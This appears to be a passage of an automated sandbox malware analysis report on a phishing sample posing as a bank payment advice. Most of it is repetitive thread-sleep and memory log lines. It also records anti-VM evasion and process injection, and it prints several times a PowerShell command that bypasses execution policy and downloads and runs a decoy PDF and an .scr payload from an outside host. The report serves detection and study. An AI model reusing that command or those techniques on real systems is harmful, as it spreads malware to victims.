Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\hadvices.scr	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Payment_Advice.scr.exe PID: 2744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Memory allocated: 29F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Memory allocated: DF0000 memory reserve \| memory write watch
Source: C:\Windows\Temp\hadvices.scr	Memory allocated: 2A80000 memory reserve \| memory write watch
Source: C:\Windows\Temp\hadvices.scr	Memory allocated: F20000 memory reserve \| memory write watch
Source: C:\Windows\Temp\hadvices.scr	Memory allocated: CE0000 memory reserve \| memory write watch
Source: C:\Windows\Temp\hadvices.scr	Memory allocated: 2A70000 memory reserve \| memory write watch
Source: C:\Windows\Temp\hadvices.scr	Memory allocated: D30000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 600000
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599851
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599632
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599424
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599296
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599171
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599056
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598939
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598816
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598688
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598576
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598464
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598347
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598224
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598096
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597968
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597856
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597744
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597632
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597509
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597392
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595877
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595696
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595582
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595461
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595277
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595132
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595013
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594901
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594789
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594677
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594549
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594424
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594299
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594174
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594049
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593924
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593799
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593674
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593549
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593424
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593299
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593174
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593042
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590637
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590531
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590407
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590260
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589986
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589846
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589721
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589596
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589471
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589346
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589221
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589096

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Window / User API: threadDelayed 490	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4290	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5528	Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Window / User API: threadDelayed 2465
Source: C:\Windows\Temp\hadvices.scr	Window / User API: threadDelayed 7317

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe TID: 6976	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe TID: 6928	Thread sleep count: 490 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5100	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7164	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 8152	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 2644	Thread sleep count: 2465 > 30
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -599851s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -599632s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 2644	Thread sleep count: 7317 > 30
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -599424s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -599296s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -599171s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -599056s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598939s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598816s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598688s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598576s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598464s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598347s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598224s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -598096s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -597968s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -597856s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -597744s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -597632s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -597509s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -597392s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -595877s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -595696s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -595582s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -595461s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -595277s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -595132s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -595013s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594901s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594789s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594677s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594549s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594424s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594299s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594174s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -594049s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593924s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593799s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593674s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593549s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593424s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593299s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593174s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -593042s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -590637s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -590531s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -590407s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -590260s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589986s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589846s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589721s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589596s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589471s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589346s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589221s >= -30000s
Source: C:\Windows\Temp\hadvices.scr TID: 6320	Thread sleep time: -589096s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 600000
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599851
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599632
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599424
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599296
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599171
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 599056
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598939
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598816
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598688
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598576
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598464
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598347
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598224
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 598096
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597968
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597856
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597744
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597632
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597509
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 597392
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595877
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595696
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595582
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595461
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595277
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595132
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 595013
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594901
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594789
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594677
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594549
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594424
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594299
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594174
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 594049
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593924
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593799
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593674
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593549
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593424
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593299
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593174
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 593042
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590637
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590531
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590407
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 590260
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589986
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589846
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589721
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589596
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589471
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589346
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589221
Source: C:\Windows\Temp\hadvices.scr	Thread delayed: delay time: 589096

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\Temp\4A6C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: powershell.exe, 00000004.00000002.2407266939.00000216F7900000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: svchost.exe, 00000008.00000002.3357715215.0000024E14A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3360543881.0000024E1A254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: hadvices.scr, 00000010.00000002.3357197186.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000004.00000002.2406257338.00000216F7315000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\hadvices.scr

Code function: 16_2_05577988 LdrInitializeThunk,

16_2_05577988

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Code function: 2_2_0040A3D2 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

2_2_0040A3D2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_00409570 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,		2_2_00409570
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_00409590 SetUnhandledExceptionFilter,		2_2_00409590

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.Payment_Advice.scr.exe.2c01dc8.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.Payment_Advice.scr.exe.2c01dc8.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.Payment_Advice.scr.exe.2c01dc8.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Memory written: C:\Users\user\Desktop\Payment_Advice.scr.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Memory written: C:\Windows\Temp\hadvices.scr base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Process created: C:\Users\user\Desktop\Payment_Advice.scr.exe "C:\Users\user\Desktop\Payment_Advice.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /S	Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -command "invoke-webrequest -uri 'https://advising-receipts.com/hsbc/payment_advice.pdf' -outfile 'c:\users\public\payment_advice.pdf'; start-process 'c:\users\public\payment_advice.pdf'; invoke-webrequest -uri 'https://advising-receipts.com/hsbc/hadvices.scr' -outfile 'c:\windows\temp\hadvices.scr'; start-process 'c:\windows\temp\hadvices.scr'"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -command "invoke-webrequest -uri 'https://advising-receipts.com/hsbc/payment_advice.pdf' -outfile 'c:\users\public\payment_advice.pdf'; start-process 'c:\users\public\payment_advice.pdf'; invoke-webrequest -uri 'https://advising-receipts.com/hsbc/hadvices.scr' -outfile 'c:\windows\temp\hadvices.scr'; start-process 'c:\windows\temp\hadvices.scr'"			Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Queries volume information: C:\Users\user\Desktop\Payment_Advice.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
